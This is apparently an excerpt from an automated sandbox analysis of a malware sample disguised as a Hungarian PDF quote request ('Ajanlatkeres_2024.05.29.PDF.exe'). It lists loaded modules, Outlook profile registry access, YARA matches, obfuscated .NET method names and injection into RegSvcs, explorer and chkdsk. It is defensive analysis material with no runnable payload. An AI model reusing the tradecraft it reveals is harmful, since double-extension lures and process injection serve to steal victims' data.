            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: ulib.dll
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: ifsutil.dll
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: devobj.dll
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: wininet.dll
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: Ajanlatkeres_2024.05.29.PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Ajanlatkeres_2024.05.29.PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Ajanlatkeres_2024.05.29.PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: chkdsk.pdbGCTL source: RegSvcs.exe, 00000013.00000002.1394975056.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.1394558501.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3742534236.0000000000BA0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: Eusz.pdb source: Ajanlatkeres_2024.05.29.PDF.exe
            Source: Binary string: jORR.pdbSHA2563 source: YLc7afPlL4RjCeK.exe.6.dr
            Source: Binary string: chkdsk.pdb source: RegSvcs.exe, 00000013.00000002.1394975056.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.1394558501.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3742534236.0000000000BA0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000013.00000002.1393977019.0000000000472000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1394168499.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1396638681.00000000052A0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1394168499.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1396638681.00000000052A0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: jORR.pdb source: YLc7afPlL4RjCeK.exe.6.dr
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000013.00000002.1393977019.0000000000472000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: Eusz.pdbSHA256 source: Ajanlatkeres_2024.05.29.PDF.exe

            Data Obfuscation

            barindex
            Source: Ajanlatkeres_2024.05.29.PDF.exe, MsgBx.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: YLc7afPlL4RjCeK.exe.6.dr, MsgBx.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, jUedmmIQbjpaEiUIOJ.cs.Net Code: QayV6GgIwS System.Reflection.Assembly.Load(byte[])
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, jUedmmIQbjpaEiUIOJ.cs.Net Code: QayV6GgIwS System.Reflection.Assembly.Load(byte[])
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7be0000.9.raw.unpack, RLhDAEYwfjHvjWVq5a.cs.Net Code: Gc3JujKCKLERSog4UEp System.Reflection.Assembly.Load(byte[])
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ec5d84.1.raw.unpack, RLhDAEYwfjHvjWVq5a.cs.Net Code: Gc3JujKCKLERSog4UEp System.Reflection.Assembly.Load(byte[])
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, BVvQkKGnivA0dbGJTm.cs.Net Code: ACU8sMjsWo System.Reflection.Assembly.Load(byte[])
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ajanlatkeres_2024.05.29.PDF.exe PID: 2820, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7532, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_0136E980 pushad ; retf 6_2_0136E989
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_07296696 push es; retf 6_2_072966A7
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_0729051E push ds; ret 6_2_0729051F
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_07296160 push esp; ret 6_2_07296165
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_0161E980 pushad ; retf 14_2_0161E989
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00402AC0 push eax; ret 15_2_00402AD4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00402AC0 push eax; ret 15_2_00402AFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00417184 push edi; iretd 19_2_00417185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00417294 push eax; ret 19_2_00417298
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00416CE4 push esi; retf 19_2_00416CE6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041E4F8 push edi; iretd 19_2_0041E4F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041D4B5 push eax; ret 19_2_0041D508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041D56C push eax; ret 19_2_0041D572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041D502 push eax; ret 19_2_0041D508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041D50B push eax; ret 19_2_0041D572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00ED225F pushad ; ret 19_2_00ED27F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00ED27FA pushad ; ret 19_2_00ED27F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00ED283D push eax; iretd 19_2_00ED2858
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F009AD push ecx; mov dword ptr [esp], ecx19_2_00F009B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00ED1368 push eax; iretd 19_2_00ED1369
            Source: C:\Windows\explorer.exeCode function: 20_2_101E4B1E push esp; retn 0000h20_2_101E4B1F
            Source: C:\Windows\explorer.exeCode function: 20_2_101E4B02 push esp; retn 0000h20_2_101E4B03
            Source: C:\Windows\explorer.exeCode function: 20_2_101E49B5 push esp; retn 0000h20_2_101E4AE7
            Source: C:\Windows\explorer.exeCode function: 20_2_107B69B5 push esp; retn 0000h20_2_107B6AE7
            Source: C:\Windows\explorer.exeCode function: 20_2_107B6B1E push esp; retn 0000h20_2_107B6B1F
            Source: C:\Windows\explorer.exeCode function: 20_2_107B6B02 push esp; retn 0000h20_2_107B6B03
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054527FA pushad ; ret 21_2_054527F9
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0545225F pushad ; ret 21_2_054527F9
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054809AD push ecx; mov dword ptr [esp], ecx21_2_054809B6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0545283D push eax; iretd 21_2_05452858
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_05451365 push eax; iretd 21_2_05451369
            Source: Ajanlatkeres_2024.05.29.PDF.exeStatic PE information: section name: .text entropy: 7.9600603885333365
            Source: YLc7afPlL4RjCeK.exe.6.drStatic PE information: section name: .text entropy: 7.964698283967239
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, JFb09MUSuxo51US2ALU.csHigh entropy of concatenated method names: 'Sd4T4xmsDx', 'EA3TJgXhSu', 'liUT6ZRXvi', 'j28TDdOfFi', 'RnpTp21vHX', 'hwwT3RBYl7', 'SOuToHqqiB', 'y0aTOwfhUQ', 'Yn2TR0qQPr', 'Dp7T2NM13V'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, uOTRDQYa6GFfWcpRFN.csHigh entropy of concatenated method names: 'LmKsMSXc0D', 'uG5sWgsIAh', 'ToString', 'Tf4sqQAwl4', 'pMIsQfFy8o', 'OwksKRF3yv', 'FreswGAO14', 'f40smtvjS2', 'QDVsg23osL', 'FvSsID5soE'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, Bs4sJE1jbd8b9NXEWB.csHigh entropy of concatenated method names: 'dsbTUX9DC2', 'xvmT8fF6f9', 'DybTVuxqWn', 'iBHTqFpVG4', 'xglTQ87dvA', 'Bc4Twv7Ovo', 'fBpTmpmLZe', 'eodZnL9CeY', 'ncCZhoxe8P', 'mGeZekwbsL'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, sPOqLThX3yn1oth9QS.csHigh entropy of concatenated method names: 'ClLZqFNUKa', 'GVVZQaXxvD', 'nYjZKU5X8n', 'Mt9ZwfcPf2', 'yC8ZmThNGi', 'TwHZgvdGfm', 'tOqZIpiNFP', 'YhsZfijJWC', 'HeJZMN2ixP', 'HMeZWKT2RF'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, C3XKhaiuGdAc0xUTDj.csHigh entropy of concatenated method names: 'SQ77O0XyOd', 'KXT7RO8oAk', 'YMI7vE77ai', 'x2E7LorF7I', 'gM57Cr57MC', 'GkV7PsIWQm', 'uYj7jT0Tq6', 'f1n79AlBhP', 'cg27FHLPhB', 'UYx7tppbl0'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, qbtJKQ587GLMigp6EV.csHigh entropy of concatenated method names: 'e2dcFA0KdR', 'Vx9ckHS4u6', 'Fc6c5HvYTa', 'nyMcBqVJaD', 'PFBcLUBvfb', 'LQscdseWda', 'ILKcCwiOte', 'U3IcPBJGCR', 'dh5cxrjp10', 'Q7YcjqXlBG'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, MDyrFajJr1JqHHKQDM.csHigh entropy of concatenated method names: 'GLdgqNQXcn', 'ebygKYla21', 'NkhgmWkN5Z', 'Fp0m1Yrpvj', 'fHSmzqkSf3', 'veLgSop4Ku', 'MIZgUiimlM', 'ueIgAbgwsZ', 'kM1g81huZD', 'R9IgVTCZoS'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, jUedmmIQbjpaEiUIOJ.csHigh entropy of concatenated method names: 'fFb8u6TBtL', 'c768qPuWqf', 'tYL8Qs7JuF', 'DHa8Ki2F95', 'Dud8wW3fHS', 'Jds8mtFPs6', 'z9V8gAOYNe', 'ILp8I4NXad', 'weN8fj1fqo', 'nrA8MyELD4'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, IsUAwXe9lCh0M0PFNq.csHigh entropy of concatenated method names: 'gATZvJDB49', 'JAEZLe24Gj', 'dKkZdgDad0', 'yQ7ZCCPGuQ', 'L0FZ5QR4qp', 'sSuZPFtlGU', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, rpNde5QNVAXKIacF0g.csHigh entropy of concatenated method names: 'Dispose', 'G1wUedjPcK', 'NcxAL2hlhJ', 'O3S00cUOwx', 'jaPU1OqLTX', 'BynUz1oth9', 'ProcessDialogKey', 'gSCASsUAwX', 'MlCAUh0M0P', 'NNqAAps4sJ'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, CvHZcyU8wvhFvOlGSyg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nZMa5fy0sH', 'IxfaBBrQfo', 'xbta0HMBrJ', 'ziZaYaiRZR', 'dhWaGuCyVn', 'UWaayXbNEZ', 'm7canM1vr1'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, eaTp1SAcY98ypEXBtP.csHigh entropy of concatenated method names: 'Bsu657PdG', 'xqgDB9whD', 'NZG3L3ZCT', 'buRovPd9d', 'phWRELd4e', 'Kid2fV9eD', 'wXbeT06yLhOPKXMneR', 'kgPAdkHPhHMp8bc5Zm', 'TQ8ZU1idW', 'GBLaEN7Ag'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, zlYB3GUUWLlLkNHJq7j.csHigh entropy of concatenated method names: 'ToString', 'OGRa8tWID9', 'N9iaVnqy4f', 'mloauMfx9i', 'a2Waqrw0yp', 'oPjaQxhEAs', 'MLGaKPAJXr', 'iXZawo7oC8', 'MiWLY9hBjdgYQp0wTqf', 'v7uEk6h3g6mnZJOtyge'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, B72amw2DFTdvkx3jt9.csHigh entropy of concatenated method names: 'uCNwpoE7Bp', 'LLawoQs5fe', 'O8gKdjHaGn', 'LNYKCx8odj', 'Sa4KPGmM86', 'qbgKxA7QVB', 'bpnKjFsw9m', 'GTgK9jGk0U', 'WEwKNfEXG3', 'nAOKFpgXOO'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, g6xgpULPC8T1YdP2US.csHigh entropy of concatenated method names: 'aOCJyeR72KjZ2jwmH9d', 'XDEYMcRJ4iI8okh2gcO', 'GwpmZE2N3Z', 'np5mTV3Bxv', 'H6Imavorir', 'kj6g6pRu3iha07LQxiM', 'A6MDfDR5bwjaPIfg1lK'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, Lve0Wbv1fAmfkSJ7xN.csHigh entropy of concatenated method names: 'SmJmuFfs9U', 'fqcmQCOrH8', 'woMmwjceYH', 'SkQmg43NaK', 'wHimImynDg', 'G97wG2g39k', 'EDfwySLUVU', 'OeHwng1RyB', 'N4xwheK29O', 'bhMwebAcA4'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, xFLBrsOc76AdDA34nm.csHigh entropy of concatenated method names: 'BcSQ5uMNxu', 'pRvQBaidf7', 'fBqQ0v38jS', 'JN4QYPkZVo', 'shsQGH74TD', 'lijQyJuNq6', 'UC3Qn4rvy2', 'znMQhqQUjp', 'LDdQe5PKxp', 'j3jQ10FrKW'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, KP5ATsVgId7OXBUdeV.csHigh entropy of concatenated method names: 'Xp4UgFLBrs', 'o76UIAdDA3', 'djdUMXyv4k', 'u8IUW7372a', 'K3jUct99ve', 'SWbUr1fAmf', 'CIWM843rGdBkBFhGbg', 'GO7lGfTHRvosal3yAl', 'GJpUU1A7pP', 'xqtU80mXUA'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, e7b2V8RjdXyv4kH8I7.csHigh entropy of concatenated method names: 'IgyKDcFQCB', 'dapK3pi6hr', 'aqDKODBFMg', 'KrJKRuasfd', 'QsuKcbhA7j', 'VYLKrYK0D5', 'wZ7KsUONxh', 'jHeKZHkqMe', 'nYyKT6JfDE', 'QahKaIAknF'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, y9Ec3dNVelmRgxq7LE.csHigh entropy of concatenated method names: 'tFVg4dfrfv', 'r1bgJDc8Uy', 'fJjg6P7rGT', 'zWHgDtIeKG', 'Kopgp0eQeN', 'hhsg3c1n7v', 'AMFgotF8gv', 'FcqgOLv5EX', 'zPSgRCaqMS', 'Iqqg2Pw3BV'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, GVWMM5yX6okaexqC4I.csHigh entropy of concatenated method names: 'QeCshG6GS9', 'hZLs1DAZ7m', 'DJeZSl8El1', 'rkiZUXHpN1', 'LfXstyHbiJ', 'wZCskUPHmS', 'z58si7cG04', 'hbTs59OxFt', 'jygsBlF0ca', 'iCes0WS2jN'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, JFb09MUSuxo51US2ALU.csHigh entropy of concatenated method names: 'Sd4T4xmsDx', 'EA3TJgXhSu', 'liUT6ZRXvi', 'j28TDdOfFi', 'RnpTp21vHX', 'hwwT3RBYl7', 'SOuToHqqiB', 'y0aTOwfhUQ', 'Yn2TR0qQPr', 'Dp7T2NM13V'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, uOTRDQYa6GFfWcpRFN.csHigh entropy of concatenated method names: 'LmKsMSXc0D', 'uG5sWgsIAh', 'ToString', 'Tf4sqQAwl4', 'pMIsQfFy8o', 'OwksKRF3yv', 'FreswGAO14', 'f40smtvjS2', 'QDVsg23osL', 'FvSsID5soE'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, Bs4sJE1jbd8b9NXEWB.csHigh entropy of concatenated method names: 'dsbTUX9DC2', 'xvmT8fF6f9', 'DybTVuxqWn', 'iBHTqFpVG4', 'xglTQ87dvA', 'Bc4Twv7Ovo', 'fBpTmpmLZe', 'eodZnL9CeY', 'ncCZhoxe8P', 'mGeZekwbsL'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, sPOqLThX3yn1oth9QS.csHigh entropy of concatenated method names: 'ClLZqFNUKa', 'GVVZQaXxvD', 'nYjZKU5X8n', 'Mt9ZwfcPf2', 'yC8ZmThNGi', 'TwHZgvdGfm', 'tOqZIpiNFP', 'YhsZfijJWC', 'HeJZMN2ixP', 'HMeZWKT2RF'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, C3XKhaiuGdAc0xUTDj.csHigh entropy of concatenated method names: 'SQ77O0XyOd', 'KXT7RO8oAk', 'YMI7vE77ai', 'x2E7LorF7I', 'gM57Cr57MC', 'GkV7PsIWQm', 'uYj7jT0Tq6', 'f1n79AlBhP', 'cg27FHLPhB', 'UYx7tppbl0'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, qbtJKQ587GLMigp6EV.csHigh entropy of concatenated method names: 'e2dcFA0KdR', 'Vx9ckHS4u6', 'Fc6c5HvYTa', 'nyMcBqVJaD', 'PFBcLUBvfb', 'LQscdseWda', 'ILKcCwiOte', 'U3IcPBJGCR', 'dh5cxrjp10', 'Q7YcjqXlBG'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, MDyrFajJr1JqHHKQDM.csHigh entropy of concatenated method names: 'GLdgqNQXcn', 'ebygKYla21', 'NkhgmWkN5Z', 'Fp0m1Yrpvj', 'fHSmzqkSf3', 'veLgSop4Ku', 'MIZgUiimlM', 'ueIgAbgwsZ', 'kM1g81huZD', 'R9IgVTCZoS'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, jUedmmIQbjpaEiUIOJ.csHigh entropy of concatenated method names: 'fFb8u6TBtL', 'c768qPuWqf', 'tYL8Qs7JuF', 'DHa8Ki2F95', 'Dud8wW3fHS', 'Jds8mtFPs6', 'z9V8gAOYNe', 'ILp8I4NXad', 'weN8fj1fqo', 'nrA8MyELD4'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, IsUAwXe9lCh0M0PFNq.csHigh entropy of concatenated method names: 'gATZvJDB49', 'JAEZLe24Gj', 'dKkZdgDad0', 'yQ7ZCCPGuQ', 'L0FZ5QR4qp', 'sSuZPFtlGU', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, rpNde5QNVAXKIacF0g.csHigh entropy of concatenated method names: 'Dispose', 'G1wUedjPcK', 'NcxAL2hlhJ', 'O3S00cUOwx', 'jaPU1OqLTX', 'BynUz1oth9', 'ProcessDialogKey', 'gSCASsUAwX', 'MlCAUh0M0P', 'NNqAAps4sJ'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, CvHZcyU8wvhFvOlGSyg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nZMa5fy0sH', 'IxfaBBrQfo', 'xbta0HMBrJ', 'ziZaYaiRZR', 'dhWaGuCyVn', 'UWaayXbNEZ', 'm7canM1vr1'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, eaTp1SAcY98ypEXBtP.csHigh entropy of concatenated method names: 'Bsu657PdG', 'xqgDB9whD', 'NZG3L3ZCT', 'buRovPd9d', 'phWRELd4e', 'Kid2fV9eD', 'wXbeT06yLhOPKXMneR', 'kgPAdkHPhHMp8bc5Zm', 'TQ8ZU1idW', 'GBLaEN7Ag'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, zlYB3GUUWLlLkNHJq7j.csHigh entropy of concatenated method names: 'ToString', 'OGRa8tWID9', 'N9iaVnqy4f', 'mloauMfx9i', 'a2Waqrw0yp', 'oPjaQxhEAs', 'MLGaKPAJXr', 'iXZawo7oC8', 'MiWLY9hBjdgYQp0wTqf', 'v7uEk6h3g6mnZJOtyge'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, B72amw2DFTdvkx3jt9.csHigh entropy of concatenated method names: 'uCNwpoE7Bp', 'LLawoQs5fe', 'O8gKdjHaGn', 'LNYKCx8odj', 'Sa4KPGmM86', 'qbgKxA7QVB', 'bpnKjFsw9m', 'GTgK9jGk0U', 'WEwKNfEXG3', 'nAOKFpgXOO'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, g6xgpULPC8T1YdP2US.csHigh entropy of concatenated method names: 'aOCJyeR72KjZ2jwmH9d', 'XDEYMcRJ4iI8okh2gcO', 'GwpmZE2N3Z', 'np5mTV3Bxv', 'H6Imavorir', 'kj6g6pRu3iha07LQxiM', 'A6MDfDR5bwjaPIfg1lK'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, Lve0Wbv1fAmfkSJ7xN.csHigh entropy of concatenated method names: 'SmJmuFfs9U', 'fqcmQCOrH8', 'woMmwjceYH', 'SkQmg43NaK', 'wHimImynDg', 'G97wG2g39k', 'EDfwySLUVU', 'OeHwng1RyB', 'N4xwheK29O', 'bhMwebAcA4'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, xFLBrsOc76AdDA34nm.csHigh entropy of concatenated method names: 'BcSQ5uMNxu', 'pRvQBaidf7', 'fBqQ0v38jS', 'JN4QYPkZVo', 'shsQGH74TD', 'lijQyJuNq6', 'UC3Qn4rvy2', 'znMQhqQUjp', 'LDdQe5PKxp', 'j3jQ10FrKW'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, KP5ATsVgId7OXBUdeV.csHigh entropy of concatenated method names: 'Xp4UgFLBrs', 'o76UIAdDA3', 'djdUMXyv4k', 'u8IUW7372a', 'K3jUct99ve', 'SWbUr1fAmf', 'CIWM843rGdBkBFhGbg', 'GO7lGfTHRvosal3yAl', 'GJpUU1A7pP', 'xqtU80mXUA'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, e7b2V8RjdXyv4kH8I7.csHigh entropy of concatenated method names: 'IgyKDcFQCB', 'dapK3pi6hr', 'aqDKODBFMg', 'KrJKRuasfd', 'QsuKcbhA7j', 'VYLKrYK0D5', 'wZ7KsUONxh', 'jHeKZHkqMe', 'nYyKT6JfDE', 'QahKaIAknF'
